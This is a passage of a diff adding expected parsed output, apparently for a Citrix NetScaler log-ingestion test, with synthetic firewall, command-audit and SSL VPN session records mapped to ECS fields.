+ ], + "user": { + "domain": "example.org" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CI INLINE_INSPECTION_LOG 4471 0 : ID 1234567890 - Source 192.168.1.102:2345 - Destination 1.128.0.0:443 Protocol HTTPS - URL https://www.example.org/login - Domain example.org - Service Authentication - Category Login - Action ALLOW - BytesSent 1500 - BytesReceived 2000 - OriginServer 192.168.1.102:1344", + "device_event_class_id": "CI", + "extended": { + "message": "ID 1234567890 - Source 192.168.1.102:2345 - Destination 1.128.0.0:443 Protocol HTTPS 
- URL https://www.example.org/login - Domain example.org - Service Authentication - Category Login - Action ALLOW - BytesSent 1500 - BytesReceived 2000 - OriginServer 192.168.1.102:1344" + }, + "facility": "local0", + "host": "ns1", + "name": "INLINE_INSPECTION_LOG", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "ALLOW", + "bytes": { + "received": 2000, + "sent": 1500 + }, + "destination": { + "ip": "1.128.0.0", + "port": 443 + }, + "domain": "example.org", + "icap_server": { + "ip": "192.168.1.102", + "port": 1344 + }, + "id": "1234567890", + "message": "ID 1234567890 - Source 192.168.1.102:2345 - Destination 1.128.0.0:443 Protocol HTTPS - URL https://www.example.org/login - Domain example.org - Service Authentication - Category Login - Action ALLOW - BytesSent 1500 - BytesReceived 2000 - OriginServer 192.168.1.102:1344", + "protocol": "HTTPS", + "service": "Authentication", + "source": { + "ip": "192.168.1.102", + "port": 2345 + }, + "url": "https://www.example.org/login" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 2000, + "ip": "1.128.0.0", + "port": 443 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "allow", + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CI INLINE_INSPECTION_LOG 4471 0 : ID 1234567890 - Source 192.168.1.102:2345 - Destination 1.128.0.0:443 Protocol HTTPS - URL https://www.example.org/login - Domain example.org - Service Authentication - Category Login - Action ALLOW - BytesSent 1500 - BytesReceived 2000 - OriginServer 192.168.1.102:1344", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "network": { + "protocol": "https" + 
}, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.102", + "1.128.0.0", + "81.2.69.144" + ] + }, + "server": { + "ip": "192.168.1.102", + "port": 1344 + }, + "source": { + "bytes": 1500, + "ip": "192.168.1.102", + "port": 2345 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "www.example.org", + "original": "https://www.example.org/login", + "path": "/login", + "scheme": "https" + }, + "user": { + "domain": "example.org" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CI TRAFFIC_MIRROR_LOG 4471 0 : ID 1234567891 - Source 192.168.1.103:3456 - Destination 1.128.0.0:443 Protocol SSH - URL ssh://1.128.0.0 - Domain example.net - Service TerminalAccess - Category SecureShell - Action DENY - RequestBytesSent 0 - ResponseBytesSent 0 - OriginServer 192.168.1.102:1344", + "device_event_class_id": "CI", + "extended": { + "message": "ID 1234567891 - Source 192.168.1.103:3456 - Destination 1.128.0.0:443 Protocol SSH - URL ssh://1.128.0.0 - Domain example.net - Service TerminalAccess - Category SecureShell - Action DENY - RequestBytesSent 0 - ResponseBytesSent 0 - OriginServer 192.168.1.102:1344" + }, + "facility": "local0", + "host": "ns1", + "name": "TRAFFIC_MIRROR_LOG", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "DENY", + "destination": { + "ip": "1.128.0.0", + "port": 443 + }, + "domain": "example.net", + "id": "1234567891", + "message": "ID 1234567891 - Source 192.168.1.103:3456 - Destination 1.128.0.0:443 Protocol SSH - URL ssh://1.128.0.0 - Domain example.net - Service TerminalAccess - Category SecureShell - Action DENY - RequestBytesSent 0 - ResponseBytesSent 0 - OriginServer 192.168.1.102:1344", + "origin_server": { + "ip": "192.168.1.102", + "port": 1344 + }, + "protocol": "SSH", + "request": { + "bytes_sent": 
0 + }, + "response": { + "bytes_sent": 0 + }, + "service": "TerminalAccess", + "source": { + "ip": "192.168.1.103", + "port": 3456 + }, + "url": "ssh://1.128.0.0" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0", + "port": 443 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "deny", + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CI TRAFFIC_MIRROR_LOG 4471 0 : ID 1234567891 - Source 192.168.1.103:3456 - Destination 1.128.0.0:443 Protocol SSH - URL ssh://1.128.0.0 - Domain example.net - Service TerminalAccess - Category SecureShell - Action DENY - RequestBytesSent 0 - ResponseBytesSent 0 - OriginServer 192.168.1.102:1344", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "network": { + "protocol": "ssh" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.103", + "1.128.0.0", + "192.168.1.102", + "81.2.69.144" + ] + }, + "server": { + "ip": "192.168.1.102", + "port": 1344 + }, + "source": { + "ip": "192.168.1.103", + "port": 3456 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "1.128.0.0", + "original": "ssh://1.128.0.0", + "scheme": "ssh" + }, + "user": { + "domain": "example.net" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : UI CMD_EXECUTED 4471 0 : User jane.doe - Remote_ip 192.168.1.105 - Command \"scp file.txt\" - Status \"Success\"", + "device_event_class_id": "UI", + "extended": { + "message": "User jane.doe - Remote_ip 
192.168.1.105 - Command \"scp file.txt\" - Status \"Success\"" + }, + "facility": "local0", + "host": "ns1", + "name": "CMD_EXECUTED", + "priority": "info" + }, + "citrix_adc": { + "log": { + "command": "scp file.txt", + "remote_ip": "192.168.1.105", + "status": "Success", + "user": "jane.doe" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "process" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : UI CMD_EXECUTED 4471 0 : User jane.doe - Remote_ip 192.168.1.105 - Command \"scp file.txt\" - Status \"Success\"", + "outcome": "success", + "severity": 0, + "timezone": "GMT", + "type": [ + "start" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "process": { + "command_line": "scp file.txt" + }, + "related": { + "ip": [ + "192.168.1.105", + "81.2.69.144" + ], + "user": [ + "jane.doe" + ] + }, + "source": { + "ip": "192.168.1.105" + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "jane.doe" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN LOGIN 4471 0 : User JohnDoe - Client_ip 192.168.1.50 - Nat_ip 10.0.0.50 - Vserver 1.128.0.0:443 - Browser_type \"Chrome\" - SSLVPN_client_type NetScalerPlugin - Group(s) \"IT,RemoteWorkers\"", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "User JohnDoe - Client_ip 192.168.1.50 - Nat_ip 10.0.0.50 - Vserver 1.128.0.0:443 - Browser_type \"Chrome\" - SSLVPN_client_type NetScalerPlugin - Group(s) \"IT,RemoteWorkers\"" + }, + "facility": 
"local0", + "host": "ns1", + "name": "LOGIN", + "priority": "info" + }, + "citrix_adc": { + "log": { + "browser_type": "Chrome", + "client_ip": "192.168.1.50", + "groups": "IT,RemoteWorkers", + "message": "User JohnDoe - Client_ip 192.168.1.50 - Nat_ip 10.0.0.50 - Vserver 1.128.0.0:443 - Browser_type \"Chrome\" - SSLVPN_client_type NetScalerPlugin - Group(s) \"IT,RemoteWorkers\"", + "nat": { + "ip": "10.0.0.50" + }, + "sslvpn_client_type": "NetScalerPlugin", + "user": "JohnDoe", + "vserver": { + "ip": "1.128.0.0", + "port": 443 + } + } + }, + "client": { + "ip": "192.168.1.50" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN LOGIN 4471 0 : User JohnDoe - Client_ip 192.168.1.50 - Nat_ip 10.0.0.50 - Vserver 1.128.0.0:443 - Browser_type \"Chrome\" - SSLVPN_client_type NetScalerPlugin - Group(s) \"IT,RemoteWorkers\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "IT,RemoteWorkers" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "10.0.0.50", + "1.128.0.0", + "192.168.1.50" + ], + "user": [ + "JohnDoe" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 443 + }, + "source": { + "nat": { + "ip": "10.0.0.50" + } + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "JohnDoe" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN LOGOUT 4471 0 : User JaneSmith - Client_ip 192.168.1.51 - Nat_ip 10.0.0.51 - Vserver 1.128.0.0:10443 - Start_time \"2023-04-01T08:00:00Z\" - End_time \"2023-04-01T12:00:00Z\" - Duration 00:00:04 - Http_resources_accessed 15 - NonHttp_services_accessed 5 - Total_TCP_connections 20 - Total_UDP_flows 10 - Total_policies_allowed 25 - 
Total_policies_denied 5 - Total_bytes_send 1 - Total_bytes_recv 500 - Total_compressedbytes_send 700 - Total_compressedbytes_recv 350 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - LogoutMethod \"Timeout\" - Group(s) \"HR,Finance\"", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "User JaneSmith - Client_ip 192.168.1.51 - Nat_ip 10.0.0.51 - Vserver 1.128.0.0:10443 - Start_time \"2023-04-01T08:00:00Z\" - End_time \"2023-04-01T12:00:00Z\" - Duration 00:00:04 - Http_resources_accessed 15 - NonHttp_services_accessed 5 - Total_TCP_connections 20 - Total_UDP_flows 10 - Total_policies_allowed 25 - Total_policies_denied 5 - Total_bytes_send 1 - Total_bytes_recv 500 - Total_compressedbytes_send 700 - Total_compressedbytes_recv 350 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - LogoutMethod \"Timeout\" - Group(s) \"HR,Finance\"" + }, + "facility": "local0", + "host": "ns1", + "name": "LOGOUT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_ip": "192.168.1.51", + "compression_ratio_recieved": 70.0, + "compression_ratio_send": 50.0, + "duration": "00:00:04", + "end_time": "2023-04-01T12:00:00.000Z", + "groups": "HR,Finance", + "http_resources_accessed": "15", + "logout_method": "Timeout", + "message": "User JaneSmith - Client_ip 192.168.1.51 - Nat_ip 10.0.0.51 - Vserver 1.128.0.0:10443 - Start_time \"2023-04-01T08:00:00Z\" - End_time \"2023-04-01T12:00:00Z\" - Duration 00:00:04 - Http_resources_accessed 15 - NonHttp_services_accessed 5 - Total_TCP_connections 20 - Total_UDP_flows 10 - Total_policies_allowed 25 - Total_policies_denied 5 - Total_bytes_send 1 - Total_bytes_recv 500 - Total_compressedbytes_send 700 - Total_compressedbytes_recv 350 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - LogoutMethod \"Timeout\" - Group(s) \"HR,Finance\"", + "nat": { + "ip": "10.0.0.51" + }, + "non_http_services_accessed": "5", + "start_time": "2023-04-01T08:00:00.000Z", + "total_bytes_received": 
500, + "total_bytes_send": 1, + "total_compressed_bytes_recieved": 350, + "total_compressed_bytes_send": 700, + "total_policies_allowed": 25, + "total_policies_denied": 5, + "total_tcp_connections": 20, + "total_udp_flows": 10, + "user": "JaneSmith", + "vserver": { + "ip": "1.128.0.0", + "port": 10443 + } + } + }, + "client": { + "ip": "192.168.1.51" + }, + "destination": { + "bytes": 500 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "end": "2023-04-01T12:00:00.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN LOGOUT 4471 0 : User JaneSmith - Client_ip 192.168.1.51 - Nat_ip 10.0.0.51 - Vserver 1.128.0.0:10443 - Start_time \"2023-04-01T08:00:00Z\" - End_time \"2023-04-01T12:00:00Z\" - Duration 00:00:04 - Http_resources_accessed 15 - NonHttp_services_accessed 5 - Total_TCP_connections 20 - Total_UDP_flows 10 - Total_policies_allowed 25 - Total_policies_denied 5 - Total_bytes_send 1 - Total_bytes_recv 500 - Total_compressedbytes_send 700 - Total_compressedbytes_recv 350 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - LogoutMethod \"Timeout\" - Group(s) \"HR,Finance\"", + "severity": 0, + "start": "2023-04-01T08:00:00.000Z", + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "HR,Finance" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "10.0.0.51", + "1.128.0.0", + "192.168.1.51" + ], + "user": [ + "JaneSmith" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 10443 + }, + "source": { + "bytes": 1, + "nat": { + "ip": "10.0.0.51" + } + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "JaneSmith" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN ICASTART 4471 0 : Source 192.168.1.52:5060 
- Destination 1.128.0.0:80 - SSLRelayAddress 10.0.0.52:443 - customername AcmeCorp - username:domainname someusername:example.domain.com - applicationName WebMail - startTime \"2023-04-01T09:00:00Z\" - connectionId 9a8b7c", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "Source 192.168.1.52:5060 - Destination 1.128.0.0:80 - SSLRelayAddress 10.0.0.52:443 - customername AcmeCorp - username:domainname someusername:example.domain.com - applicationName WebMail - startTime \"2023-04-01T09:00:00Z\" - connectionId 9a8b7c" + }, + "facility": "local0", + "host": "ns1", + "name": "ICASTART", + "priority": "info" + }, + "citrix_adc": { + "log": { + "application_name": "WebMail", + "connection_id": "9a8b7c", + "customer_name": "AcmeCorp", + "destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "domain_name": "example.domain.com", + "message": "Source 192.168.1.52:5060 - Destination 1.128.0.0:80 - SSLRelayAddress 10.0.0.52:443 - customername AcmeCorp - username:domainname someusername:example.domain.com - applicationName WebMail - startTime \"2023-04-01T09:00:00Z\" - connectionId 9a8b7c", + "source": { + "ip": "192.168.1.52", + "port": 5060 + }, + "ssl_relay": { + "address": "10.0.0.52", + "port": 443 + }, + "start_time": "2023-04-01T09:00:00.000Z", + "username": "someusername" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN ICASTART 4471 0 : Source 192.168.1.52:5060 - Destination 1.128.0.0:80 - SSLRelayAddress 10.0.0.52:443 - customername AcmeCorp - 
username:domainname someusername:example.domain.com - applicationName WebMail - startTime \"2023-04-01T09:00:00Z\" - connectionId 9a8b7c", + "severity": 0, + "start": "2023-04-01T09:00:00.000Z", + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.52", + "1.128.0.0", + "81.2.69.144", + "10.0.0.52" + ], + "user": [ + "someusername" + ] + }, + "source": { + "ip": "192.168.1.52", + "port": 5060 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.domain.com", + "name": "someusername" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN ICAEND_CONNSTAT 4471 0 : Source 192.168.1.53:22 - Destination 1.128.0.0:443 - SSLRelayAddress 10.0.0.53:443 - customername BetaInc - username:domainname someusername:example.domain.com - startTime \"2023-04-01T09:00:00Z\" - endTime \"2023-04-01T09:45:00Z\" - Duration 00:01:04 - Total_bytes_send 500000 - Total_bytes_recv 250000 - Total_compressedbytes_send 350000 - Total_compressedbytes_recv 175000 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - connectionId 1a2b3c", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "Source 192.168.1.53:22 - Destination 1.128.0.0:443 - SSLRelayAddress 10.0.0.53:443 - customername BetaInc - username:domainname someusername:example.domain.com - startTime \"2023-04-01T09:00:00Z\" - endTime \"2023-04-01T09:45:00Z\" - Duration 00:01:04 - Total_bytes_send 500000 - Total_bytes_recv 250000 - Total_compressedbytes_send 350000 - Total_compressedbytes_recv 175000 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - connectionId 1a2b3c" + }, + "facility": "local0", + "host": "ns1", + "name": "ICAEND_CONNSTAT", + "priority": "info" + }, + "citrix_adc": { + "log": { + 
"compression_ratio_recieved": 70.0, + "compression_ratio_send": 50.0, + "connection_id": "1a2b3c", + "customer_name": "BetaInc", + "destination": { + "ip": "1.128.0.0", + "port": 443 + }, + "domain_name": "example.domain.com", + "duration": "00:01:04", + "end_time": "2023-04-01T09:45:00.000Z", + "message": "Source 192.168.1.53:22 - Destination 1.128.0.0:443 - SSLRelayAddress 10.0.0.53:443 - customername BetaInc - username:domainname someusername:example.domain.com - startTime \"2023-04-01T09:00:00Z\" - endTime \"2023-04-01T09:45:00Z\" - Duration 00:01:04 - Total_bytes_send 500000 - Total_bytes_recv 250000 - Total_compressedbytes_send 350000 - Total_compressedbytes_recv 175000 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - connectionId 1a2b3c", + "source": { + "ip": "192.168.1.53", + "port": 22 + }, + "ssl_relay": { + "address": "10.0.0.53", + "port": 443 + }, + "start_time": "2023-04-01T09:00:00.000Z", + "total_bytes_received": 250000, + "total_bytes_send": 500000, + "total_compressed_bytes_recieved": 175000, + "total_compressed_bytes_send": 350000, + "username": "someusername" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 250000, + "ip": "1.128.0.0", + "port": 443 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "end": "2023-04-01T09:45:00.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN ICAEND_CONNSTAT 4471 0 : Source 192.168.1.53:22 - Destination 1.128.0.0:443 - SSLRelayAddress 10.0.0.53:443 - customername BetaInc - username:domainname someusername:example.domain.com - startTime \"2023-04-01T09:00:00Z\" - endTime \"2023-04-01T09:45:00Z\" - Duration 00:01:04 
- Total_bytes_send 500000 - Total_bytes_recv 250000 - Total_compressedbytes_send 350000 - Total_compressedbytes_recv 175000 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - connectionId 1a2b3c", + "severity": 0, + "start": "2023-04-01T09:00:00.000Z", + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.53", + "1.128.0.0", + "81.2.69.144", + "10.0.0.53" + ], + "user": [ + "someusername" + ] + }, + "source": { + "bytes": 500000, + "ip": "192.168.1.53", + "port": 22 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.domain.com", + "name": "someusername" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN TCPCONNSTAT 4471 0 : User AliceCooper - Client_ip 192.168.1.54 - Nat_ip 10.0.0.54 - Vserver 1.128.0.0:20443 - Source 192.168.1.55:443 - Destination 1.128.0.0:22 - Start_time \"2023-04-01T10:00:00Z\" - End_time \"2023-04-01T11:00:00Z\" - Duration 00:02:04 - Total_bytes_send 800000 - Total_bytes_recv 400000 - Total_compressedbytes_send 560000 - Total_compressedbytes_recv 280000 - Compression_ratio_send 70.00% - Compression_ratio_recv 70.00% - Access Full - Group(s) \"Developers,QA\"", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "User AliceCooper - Client_ip 192.168.1.54 - Nat_ip 10.0.0.54 - Vserver 1.128.0.0:20443 - Source 192.168.1.55:443 - Destination 1.128.0.0:22 - Start_time \"2023-04-01T10:00:00Z\" - End_time \"2023-04-01T11:00:00Z\" - Duration 00:02:04 - Total_bytes_send 800000 - Total_bytes_recv 400000 - Total_compressedbytes_send 560000 - Total_compressedbytes_recv 280000 - Compression_ratio_send 70.00% - Compression_ratio_recv 70.00% - Access Full - Group(s) \"Developers,QA\"" + }, + "facility": "local0", + "host": "ns1", + "name": 
"TCPCONNSTAT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "access": "Full", + "client_ip": "192.168.1.54", + "compression_ratio_recieved": 70.0, + "compression_ratio_send": 70.0, + "destination": { + "ip": "1.128.0.0", + "port": 22 + }, + "duration": "00:02:04", + "end_time": "2023-04-01T11:00:00.000Z", + "groups": "Developers,QA", + "message": "User AliceCooper - Client_ip 192.168.1.54 - Nat_ip 10.0.0.54 - Vserver 1.128.0.0:20443 - Source 192.168.1.55:443 - Destination 1.128.0.0:22 - Start_time \"2023-04-01T10:00:00Z\" - End_time \"2023-04-01T11:00:00Z\" - Duration 00:02:04 - Total_bytes_send 800000 - Total_bytes_recv 400000 - Total_compressedbytes_send 560000 - Total_compressedbytes_recv 280000 - Compression_ratio_send 70.00% - Compression_ratio_recv 70.00% - Access Full - Group(s) \"Developers,QA\"", + "nat": { + "ip": "10.0.0.54" + }, + "source": { + "ip": "192.168.1.55", + "port": 443 + }, + "start_time": "2023-04-01T10:00:00.000Z", + "total_bytes_received": 400000, + "total_bytes_send": 800000, + "total_compressed_bytes_recieved": 280000, + "total_compressed_bytes_send": 560000, + "user": "AliceCooper", + "vserver": { + "ip": "1.128.0.0", + "port": 20443 + } + } + }, + "client": { + "ip": "192.168.1.54" + }, + "destination": { + "bytes": 400000, + "ip": "1.128.0.0", + "port": 22 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "end": "2023-04-01T11:00:00.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN TCPCONNSTAT 4471 0 : User AliceCooper - Client_ip 192.168.1.54 - Nat_ip 10.0.0.54 - Vserver 1.128.0.0:20443 - Source 192.168.1.55:443 - Destination 1.128.0.0:22 - Start_time \"2023-04-01T10:00:00Z\" - End_time \"2023-04-01T11:00:00Z\" - Duration 00:02:04 - Total_bytes_send 800000 - Total_bytes_recv 400000 - Total_compressedbytes_send 560000 - Total_compressedbytes_recv 280000 - Compression_ratio_send 70.00% - Compression_ratio_recv 70.00% 
- Access Full - Group(s) \"Developers,QA\"", + "severity": 0, + "start": "2023-04-01T10:00:00.000Z", + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "Developers,QA" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.55", + "1.128.0.0", + "10.0.0.54", + "192.168.1.54" + ], + "user": [ + "AliceCooper" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 20443 + }, + "source": { + "bytes": 800000, + "ip": "192.168.1.55", + "nat": { + "ip": "10.0.0.54" + }, + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "AliceCooper" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN TCPCONN_TIMEDOUT 4471 0 : User CharlieBrown - Client_ip 192.168.1.56 - Nat_ip 10.0.0.56 - Vserver 1.128.0.0:10443 - Last_contact \"2023-04-01T13:00:00Z\" - Group(s) \"Sales,Marketing\"", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "User CharlieBrown - Client_ip 192.168.1.56 - Nat_ip 10.0.0.56 - Vserver 1.128.0.0:10443 - Last_contact \"2023-04-01T13:00:00Z\" - Group(s) \"Sales,Marketing\"" + }, + "facility": "local0", + "host": "ns1", + "name": "TCPCONN_TIMEDOUT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_ip": "192.168.1.56", + "groups": "Sales,Marketing", + "last_contact": "2023-04-01T13:00:00Z", + "message": "User CharlieBrown - Client_ip 192.168.1.56 - Nat_ip 10.0.0.56 - Vserver 1.128.0.0:10443 - Last_contact \"2023-04-01T13:00:00Z\" - Group(s) \"Sales,Marketing\"", + "nat": { + "ip": "10.0.0.56" + }, + "user": "CharlieBrown", + "vserver": { + "ip": "1.128.0.0", + "port": 10443 + } + } + }, + "client": { + "ip": "192.168.1.56" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 
10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN TCPCONN_TIMEDOUT 4471 0 : User CharlieBrown - Client_ip 192.168.1.56 - Nat_ip 10.0.0.56 - Vserver 1.128.0.0:10443 - Last_contact \"2023-04-01T13:00:00Z\" - Group(s) \"Sales,Marketing\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "Sales,Marketing" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "10.0.0.56", + "1.128.0.0", + "192.168.1.56" + ], + "user": [ + "CharlieBrown" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 10443 + }, + "source": { + "nat": { + "ip": "10.0.0.56" + } + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "CharlieBrown" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN UDPFLOWSTAT 4471 0 : User DianaPrince - Client_ip 192.168.1.57 - Nat_ip 10.0.0.57 - Vserver 1.128.0.0:443 - Source 192.168.1.58:3389 - Destination 1.128.0.0:22 - Start_time \"2023-04-01T14:00:00Z\" - End_time \"2023-04-01T15:00:00Z\" - Duration 00:03:04 - Total_bytes_send 1200000 - Total_bytes_recv 600000 - Access RemoteDesktop - Group(s) \"Management,Executives\"", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "User DianaPrince - Client_ip 192.168.1.57 - Nat_ip 10.0.0.57 - Vserver 1.128.0.0:443 - Source 192.168.1.58:3389 - Destination 1.128.0.0:22 - Start_time \"2023-04-01T14:00:00Z\" - End_time \"2023-04-01T15:00:00Z\" - Duration 00:03:04 - Total_bytes_send 1200000 - Total_bytes_recv 600000 - Access RemoteDesktop - Group(s) \"Management,Executives\"" + }, + "facility": "local0", + "host": "ns1", + "name": "UDPFLOWSTAT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "access": "RemoteDesktop", + "client_ip": "192.168.1.57", + "destination": { + "ip": "1.128.0.0", + "port": 22 + }, + "duration": "00:03:04", + "end_time": 
